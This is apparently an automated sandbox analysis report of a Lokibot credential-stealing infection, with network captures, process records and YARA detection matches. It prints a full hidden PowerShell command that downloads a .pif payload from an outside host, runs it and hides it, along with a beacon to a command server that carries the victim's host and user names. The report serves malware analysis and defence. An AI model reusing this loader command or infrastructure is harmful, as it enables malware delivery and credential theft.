                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:41.280592918 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:41.948029995 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:41 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.1049706188.114.97.34437360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-10-03 07:20:41 UTC196OUTGET /flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif HTTP/1.1
                                                          Host: www.sodiumlaurethsulfatedesyroyer.com
                                                          Connection: Keep-Alive
                                                          2024-10-03 07:20:41 UTC668INHTTP/1.1 200 OK
                                                          Date: Thu, 03 Oct 2024 07:20:41 GMT
                                                          Content-Type: application/octet-stream
                                                          Content-Length: 371712
                                                          Connection: close
                                                          Last-Modified: Thu, 03 Oct 2024 07:01:39 GMT
                                                          ETag: "66fe4153-5ac00"
                                                          Accept-Ranges: bytes
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AymEIG7pQ5XTxJK77NGvv00XIG2ezJfCCwnkysw2tolwFywFd2lLGJHaok3MEQiuGsXIlk%2FDz9mJ2ePL91bAJo%2Br%2B1yHEbZYnQ3sB%2FC44Xs91Aj%2F%2Bq3%2FgkcIMD0sBuwaNs2LsFEBGV0h0V%2BOHdXwFu7ZfhY9rEIV"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ccb2bcaf94d2394-EWR
                                                          2024-10-03 07:20:41 UTC701INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 51 41 fe 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ac 00 00 00 fc 04 00 00 00 00 00 0a 20 06 00 00 20 05 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELQAf @ @`
                                                          2024-10-03 07:20:41 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          2024-10-03 07:20:41 UTC1369INData Raw: 7c 4e ba 89 6a ae b4 5c 4b 64 73 41 42 5e 60 4e 31 ac c5 3b 82 8b 33 e3 a3 8c 99 7b ee 92 49 5f 13 4b 5b c4 ad 38 08 e4 bd 5d 1e f8 18 3a ae 91 8d ac e5 78 b9 1e 15 da 31 fd aa 71 64 b2 f6 61 81 c6 8d 45 a7 04 ad 6d 78 8f f6 ac 2e dc ce e4 d9 46 7d 2c 16 1c a8 0c 94 79 27 85 6b bf 5b 43 4e 3b e5 ac 3c 99 80 ab c3 d1 88 1a 0f 8e 07 c5 3f ba bd 53 60 76 82 cc cb 80 c5 14 2a 46 a6 34 ef 28 63 1b 94 37 0d c1 52 2f 83 30 a2 52 ce e0 37 fa bc d1 15 8d 28 a2 cd 42 c4 f2 a9 d2 51 9f 80 cc 3c 84 66 51 c6 9c 8e af 2a 2d ee 48 3e 91 0b bd 04 77 f7 1f 1e 43 43 61 1d 7f 64 59 1a 7e 33 a6 49 68 92 d0 a3 67 22 b2 0b f6 93 1a 72 04 92 a7 26 18 64 65 81 59 d6 02 05 c2 72 8f 0f 82 c9 27 ea 5e 2f 7c 0f 02 56 08 dd da d5 42 e9 a9 c5 9c 6f eb d4 53 dd 10 6e 50 77 d2 32 b6 a3
                                                          Data Ascii: |Nj\KdsAB^`N1;3{I_K[8]:x1qdaEmx.F},y'k[CN;<?S`v*F4(c7R/0R7(BQ<fQ*-H>wCCadY~3Ihg"r&deYr'^/|VBoSnPw2
                                                          2024-10-03 07:20:41 UTC1369INData Raw: 72 46 f2 c3 4d 77 26 40 f9 de 9a 82 e2 71 2b 4d 54 31 f3 8c cb dc 32 b7 a6 30 56 03 ce 23 90 7d cf 5d 64 6c 20 d9 9a 0f 4b 5f 0c 11 bf 84 ab a6 14 e6 a1 74 32 c8 ca d6 c9 c5 42 e7 4a cf 9f 58 6d ce 45 8b ce 24 2c 7c c8 e8 2f 72 f8 35 89 75 f0 f3 f3 dd 22 13 a3 92 b7 8c 97 1c 18 b7 df 8c 83 c1 d0 d2 ca d6 f7 8c 53 b1 fe 8f 32 0e 1e ea 53 3d 35 2b 7a 35 37 9f 8a 78 8d 8a ae 05 fe f9 e9 14 d1 5a a4 82 e0 88 ca 43 71 cf 98 a0 94 f8 4e e2 ec 67 bd 15 62 c6 89 7f f6 b2 27 e5 5e b9 72 3b 17 0f 33 3f f5 12 63 91 ca a9 0b 31 9e 8d 5f af 87 14 03 34 67 a6 b9 35 06 54 63 2e ba 12 8e 40 24 fd 7d fd ce 52 f2 2e 4f f9 1b 92 36 9a ae c6 54 33 ed 62 5b 17 29 e8 66 b7 c2 8e 56 88 e3 89 b9 28 c1 06 a4 a5 19 8a 9b 76 81 6d 86 10 1d 82 a9 71 ac c1 29 5e af f5 c7 0b ce 3f 84
                                                          Data Ascii: rFMw&@q+MT120V#}]dl K_t2BJXmE$,|/r5u"S2S=5+z57xZCqNgb'^r;3?c1_4g5Tc.@$}R.O6T3b[)fV(vmq)^?
                                                          2024-10-03 07:20:41 UTC1369INData Raw: 2f 62 29 13 76 ff 9d e9 2c c1 44 5c 5b df 35 88 e4 1d 8a ae 26 92 3a 01 35 a8 17 3c f7 a4 76 2c 05 74 e5 f5 f8 cf 46 66 df 55 62 8d 7d e2 ef 3b c2 6d 07 ab f1 86 39 34 bb 20 95 c1 4c ba 31 39 8c 46 55 0f 10 42 73 e3 61 c7 29 0d 46 58 d0 b5 ef 72 12 c3 90 99 4b 88 a3 49 af 2a e8 5e 38 64 6a bb 37 67 af 2c 33 2c af 74 d7 3b e2 cc 43 d3 33 a9 28 0e 8d f2 f7 8a 42 59 bd d4 02 c6 6d 2a 74 4f b6 03 57 5e 2e 2c 9b f3 e5 ee 86 a3 31 a4 5d 1d 29 25 bb bf d8 fe f8 37 3e 78 1e 1c be bb 01 d5 75 11 40 a3 bf 7f 14 a0 29 84 6b ec d7 f8 6e bd b3 0b 56 37 47 db 64 05 34 1d fc b0 f7 7e f8 31 0d e1 9d dc f6 e8 17 50 95 40 7c 9c 90 0f c0 d1 3d f2 3d b6 fd 09 8d 7c ae 06 4a e0 70 b6 79 93 8a 6e 22 7c 7d 2b 09 39 71 3d 38 e8 d5 58 37 2d 6d 96 38 df bc 66 3b 5e fa a9 62 6e 6f
                                                          Data Ascii: /b)v,D\[5&:5<v,tFfUb};m94 L19FUBsa)FXrKI*^8dj7g,3,t;C3(BYm*tOW^.,1])%7>xu@)knV7Gd4~1P@|==|Jpyn"|}+9q=8X7-m8f;^bno
                                                          2024-10-03 07:20:41 UTC1369INData Raw: 3c 0d 83 91 9b a6 48 5a 9c 7d b1 a1 c3 17 d6 05 d0 42 bd 31 c2 ee ff 6d a4 87 0d 22 36 95 06 76 29 2a 1c e4 dd 15 6b 5e 90 e2 94 3c 58 dc 80 3b 9e e0 e0 da b7 0b 06 c4 f4 84 58 92 c5 dd 98 d9 6c 19 ac 8e 8b 90 38 42 65 73 68 ee 05 6a 26 1a d9 2b f1 f6 68 33 dc 8f 06 2a 1f 5b 25 3d 4d a2 a6 8d 45 58 9a cf 60 95 ae 4d c4 67 79 c4 55 68 e5 6e 4c 3c 5b 72 97 88 dd 86 28 21 97 e5 c1 bb b7 17 2d c3 c2 74 01 ce ba 6b 46 88 0c 48 da 77 ce f0 b7 49 07 d4 f3 27 65 a5 46 63 c4 04 31 c8 d6 45 2d 53 13 c9 3c da 21 d7 b4 eb 56 cd e8 e0 9b 59 7c 7f dd 0c ea 98 51 c3 bd 7c 62 f6 7d a9 07 a2 10 11 f7 bc 90 66 3f cc 81 b5 a8 8e 92 d2 47 34 2d 79 df 2a 77 23 2c 28 4d 4b 0a 27 b9 01 67 70 5b c4 6b 7b 2c d7 6f 11 65 f9 50 c5 ea 5d c2 02 38 93 a8 73 e9 cb a1 54 42 77 0c 43 4f
                                                          Data Ascii: <HZ}B1m"6v)*k^<X;Xl8Beshj&+h3*[%=MEX`MgyUhnL<[r(!-tkFHwI'eFc1E-S<!VY|Q|b}f?G4-y*w#,(MK'gp[k{,oeP]8sTBwCO
                                                          2024-10-03 07:20:41 UTC1369INData Raw: 82 24 57 07 df c1 5d ea 84 12 26 ad 35 76 bf 1b 31 53 8d 51 84 d5 22 dc bd 19 c0 c9 01 d8 20 3e aa 63 01 e8 c5 ce b4 07 03 56 8b 17 d4 51 e2 da 1d c8 e8 82 c8 fe ec de cb 0a 0f 1d d1 8f de cd c0 79 01 e9 dc 2e 11 bc c7 47 0d 41 7e e9 9b 79 22 d5 be df a1 3b c0 50 87 d9 86 6e 27 ab 14 e7 12 64 f0 dc 9f b6 28 e5 82 cf 49 47 83 dc fb 48 49 02 d9 8f 28 76 67 8c 89 a7 b4 4e 7b 65 8c 63 92 a9 9f 0b 35 5d 54 b0 16 5f e9 55 34 87 fa 61 a6 48 12 8e 4e 86 98 ee 12 30 cb f2 4a 4f a1 04 6a 16 83 99 1f fc db 35 c0 88 b4 cc 57 ae 9b 68 6a 43 a0 b2 53 b8 22 f8 ab 92 75 45 db fd 68 8f a4 12 83 6e 57 31 7e ce f0 5f b4 4d d3 c6 66 5b e5 48 84 c7 f9 f9 b5 96 17 6f 67 33 3a ab 5f dd fe 07 e5 a0 d4 8e f6 55 54 fc 81 c6 52 99 ab 06 c0 1c dd 4f e0 4c d8 48 24 22 2d a0 91 db c6
                                                          Data Ascii: $W]&5v1SQ" >cVQy.GA~y";Pn'd(IGHI(vgN{ec5]T_U4aHN0JOj5WhjCS"uEhnW1~_Mf[Hog3:_UTROLH$"-
                                                          2024-10-03 07:20:41 UTC1369INData Raw: 08 48 d9 ad 65 d4 28 88 65 1e 57 f3 dd 1c 73 6c 75 a8 aa 41 84 16 2f a2 ba ea 93 bb 71 99 a8 44 81 37 c8 cc 9e f3 0c 14 8a 5a b8 ce c7 83 7f 96 c9 0a d7 aa e7 9d 4c e7 b9 b9 01 93 d9 8a f2 94 5a 4d 5d e9 ad 83 4c b9 3c f0 35 be 68 37 10 0b 12 f0 7d a4 c5 03 f7 5f a1 3d 89 0d 9b 53 0a 4f b7 a2 80 00 60 cd b1 2d 4a 9c fc fe ed ac 4f 1c 8c 4d a5 c5 08 cf 5c 53 b2 20 71 c9 57 b4 3a 73 81 a6 4d 7b 38 b2 d3 29 bb e8 86 20 5a e1 bc 43 8c 35 87 e3 92 44 b9 9a 14 84 31 bb 91 49 c7 48 73 a6 40 3a 02 c0 2f c1 8f 8a 35 61 50 6b bc a9 84 97 2b b9 f7 92 46 1f a7 f2 db a8 3e 64 04 03 85 a9 dd 38 4a 0d ef 17 16 fc e7 d4 5c 19 af b0 57 90 2f e3 fb 1c 65 30 8a b6 1b 61 7c 58 c4 5d 6b 57 d7 cd 78 10 e1 df d4 b2 f6 6f 2d 5c ee be 00 ea e7 27 0e 74 59 61 ba 4b 2b 34 70 44 0a
                                                          Data Ascii: He(eWsluA/qD7ZLZM]L<5h7}_=SO`-JOM\S qW:sM{8) ZC5D1IHs@:/5aPk+F>d8J\W/e0a|X]kWxo-\'tYaK+4pD
                                                          2024-10-03 07:20:41 UTC1369INData Raw: 65 73 75 94 dc 43 50 bc 8d 6c 52 58 99 90 9a cd e9 a0 c1 02 dc a7 af 08 be 17 7f 38 f0 c3 21 ec 49 14 01 64 9b 34 19 e1 d9 dc 17 e5 c3 0e 72 ed 32 e7 6b 0c b8 f8 0c 45 74 3e 87 88 03 f1 c9 1b 65 2b 8b 66 90 e4 08 ee 85 e4 8f b0 de d5 31 8a bf b4 87 f0 17 95 48 36 6b e8 5c 74 7d cb 0c e8 ea 01 af 3e fa e8 69 8b 98 04 0a ff 85 c6 ea 42 b2 0c 0c d1 1f 66 ea c9 0a 78 46 91 98 f2 49 63 5c 35 f0 d4 50 0f 10 3a 98 1a 02 be 20 d7 14 9b d4 1f c2 20 01 87 3c 51 e2 1f e6 34 84 a3 8d b2 13 6d 0b f3 5d d6 83 f8 28 58 41 d6 74 11 a3 27 a4 56 9b 7c 70 6c 68 1e dc 09 ff 31 48 2a 91 51 d1 1e 4c af 8b 5f 02 2f 5b ec 8e 49 9a 7c 11 bb 41 91 48 e2 23 52 e8 fc 24 34 a0 02 d9 0c 62 eb 86 4f 06 46 0f df 93 c3 b8 a5 28 e3 40 d0 eb af 6f c5 ef 7b ea ef 96 df 7b df 30 db 88 81 ac
                                                          Data Ascii: esuCPlRX8!Id4r2kEt>e+f1H6k\t}>iBfxFIc\5P: <Q4m](XAt'V|plh1H*QL_/[I|AH#R$4bOF(@o{{0
                                                          2024-10-03 07:20:41 UTC1369INData Raw: bf 94 ee f4 e7 68 ba 34 41 cf 72 22 27 ec 84 2f 53 6f 07 62 ea a2 34 28 d1 fa 74 ba 79 e0 64 7e ae d8 8c 96 cc a6 44 2a e1 36 e2 ba 57 55 5a f5 c4 55 6a 23 d9 ed ea 09 f9 55 ab 33 33 7d 4f e7 ae 33 04 46 38 db b2 e1 09 7e 7c 9d 27 ad 75 15 ca fc d9 31 33 97 ba ed c2 49 e0 73 7d d1 0c 7a 45 45 a7 ec 3d 2f e7 2c 97 4d 9c ce a9 d8 c5 27 d2 c1 b1 99 23 26 3e 93 70 e8 14 29 0c 64 c4 1c 47 65 c0 ef 4f 4e aa 89 82 80 02 a2 2a 21 74 df f8 2a ff 0f ff da 95 d8 3f 4d 84 98 16 f9 d7 ac 89 1d a8 33 ac b9 62 28 c7 9d 86 82 6d 42 ed 7d d7 9b b5 5d 73 22 1d 71 62 e0 2e 6c b4 91 d5 1a 00 15 ed 53 2e 7d 07 f4 22 79 c9 65 3e af f3 3d 14 9e 19 22 9d 3a df 32 5b be d9 d9 91 35 85 cb 03 d1 43 4a da 20 3f fa 53 f3 cd c3 2b 5c 51 ee f8 0c 47 74 17 48 51 db dd 8e 84 b2 c1 5f 16
                                                          Data Ascii: h4Ar"'/Sob4(tyd~D*6WUZUj#U33}O3F8~|'u13Is}zEE=/,M'#&>p)dGeON*!t*?M3b(mB}]s"qb.lS.}"ye>=":2[5CJ ?S+\QGtHQ_


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:03:20:34
                                                          Start date:03/10/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';
                                                          Imagebase:0x7ff7b2bb0000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:03:20:34
                                                          Start date:03/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff620390000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:03:20:42
                                                          Start date:03/10/2024
                                                          Path:C:\Users\user\Desktop\screens.pif
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\screens.pif"
                                                          Imagebase:0xb00000
                                                          File size:371'712 bytes
                                                          MD5 hash:DB94D5DF4ADD0A06F261EAE73C2DA5DB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Antivirus matches:
                                                          • Detection: 100%, Joe Sandbox ML
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:03:20:43
                                                          Start date:03/10/2024
                                                          Path:C:\Users\user\Desktop\screens.pif
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\screens.pif
                                                          Imagebase:0xda0000
                                                          File size:371'712 bytes
                                                          MD5 hash:DB94D5DF4ADD0A06F261EAE73C2DA5DB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000005.00000002.2659632439.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:6
                                                          Start time:03:20:43
                                                          Start date:03/10/2024
                                                          Path:C:\Users\user\Desktop\screens.pif
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\screens.pif
                                                          Imagebase:0x330000
                                                          File size:371'712 bytes
                                                          MD5 hash:DB94D5DF4ADD0A06F261EAE73C2DA5DB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:7
                                                          Start time:03:20:43
                                                          Start date:03/10/2024
                                                          Path:C:\Users\user\Desktop\screens.pif
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\screens.pif
                                                          Imagebase:0x260000
                                                          File size:371'712 bytes
                                                          MD5 hash:DB94D5DF4ADD0A06F261EAE73C2DA5DB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:11
                                                          Start time:03:20:45
                                                          Start date:03/10/2024
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 80
                                                          Imagebase:0x5a0000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:03:20:45
                                                          Start date:03/10/2024
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 80
                                                          Imagebase:0x5a0000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Reset < >
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1545266303.00007FF7C0310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0310000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0310000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: J_L;
                                                            • API String ID: 0-1607133157
                                                            • Opcode ID: bf1eb2eb3b76272b84b384e9b4c3e8f8b1888b3da1ddab3200c08cbe643688fe
                                                            • Instruction ID: 8a30de0c58f6f7a3a2681bb4b71cb4bcf156206aa9aae6e64645d9ab983d8139
                                                            • Opcode Fuzzy Hash: bf1eb2eb3b76272b84b384e9b4c3e8f8b1888b3da1ddab3200c08cbe643688fe
                                                            • Instruction Fuzzy Hash: BFD12461A0DBC64FE756AB7858651B5BFE4EF4B220B4801FFD089C71E3DA187845C3A2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1545266303.00007FF7C0310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0310000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0310000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 23cd291a496b4e9f8b531e76ebbaf97299ee7c72406c030f05bcd8609a2dce81
                                                            • Instruction ID: 81df86e64853f3dcd7b5227e12cfc30bdda7d9138df7c17f76a8b21ff48a1981
                                                            • Opcode Fuzzy Hash: 23cd291a496b4e9f8b531e76ebbaf97299ee7c72406c030f05bcd8609a2dce81
